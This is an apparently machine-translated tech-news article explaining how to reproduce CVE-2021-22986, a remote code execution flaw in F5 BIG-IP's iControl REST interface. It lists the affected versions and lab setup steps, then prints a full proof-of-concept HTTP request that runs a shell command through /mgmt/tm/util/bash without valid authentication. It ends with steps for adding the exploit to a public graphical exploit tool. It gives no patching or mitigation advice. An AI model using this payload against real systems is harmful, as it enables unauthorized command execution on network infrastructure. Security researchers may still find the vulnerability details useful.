In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-02 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
This article shows you how to reproduce F5 BIG-IP remote code execution vulnerability CVE-2021-22986, concise and easy to understand, definitely can make you shine, through the detailed introduction of this article I hope you can gain something.
0x01 Vulnerability Description
F5 BIG-IP is an application delivery platform of F5 company, which integrates network traffic management, application security management, Load Balancer and other functions.
CVE-2021-22986 This vulnerability allows an unauthenticated attacker to gain network access to the iControl REST interface via the BIG-IP management interface and its own IP address to execute arbitrary system commands, create or delete files, and disable services.
0x02 Vulnerability Impact F5 BIG-IP 16.0.0-16.0.1F5 BIG-IP 12.1.0-12.1.5.2F5 BIG-IP 15.1.0-15.1.2F5 BIG-IQ 7.1.0-7.1.0.2F5 BIG-IP 14.1.0-14.1.3.1F5 BIG-IQ 7.0.0-7.0.0.1F5 BIG-IP 13.1.0-13.1.3.5F5 BIG-IQ 6.0.0-6.1.00x03 bug recurrence
https://login.f5.com/resource/registerEmail.do Register and download
https://downloads.f5.com/esd/eula.sv? sw=BIG-IP&pro=big-ip_v16.x&ver=16.0.1&container=16.0.1_Virtual-Edition&path=&file=&B1=I+Accept Select ova format, you can quickly use vm virtual machine to open, after installation, user name: root, password: default, after successful login, enter config, enter config several times to see the current ip, access Enter
3.1 POC attack POST /mgmt/tm/util/bash HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeAuthorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token: Host: 192.168.1.191Content-Length: 39{"command":"run","utilCmdArgs":"-c id"}
0x04 Writing with tools
Write directly using the last graphical exploit tool
Graphical exploit tool updated
Project address: github.com/yhy0/ExpDemo-JavaFX
V1.1
Refer to the ice scorpion agent, add agent settings, easy to walk burp debugging
Optimize the batch check logic by using interfaces so that each time a new exploit is added, there is no need to modify the batch check logic.
Create a new CVE_2021_22986 class under src/main/java/com/yhy/core, implement the ExploitInterface interface, and implement the functions inside. Fill in the details. Copy the contents of the example CVE_2020_14882 in the project directly. Modify the contents and fill in the payload.
After writing, go to src/main/java/com/yhy/core/Constants.java and src/main/java/com/yhy/tools/Tools.java to modify
Run it.
This is how to reproduce F5 BIG-IP remote code execution vulnerability CVE-2021-22986. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserves, please pay attention to the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.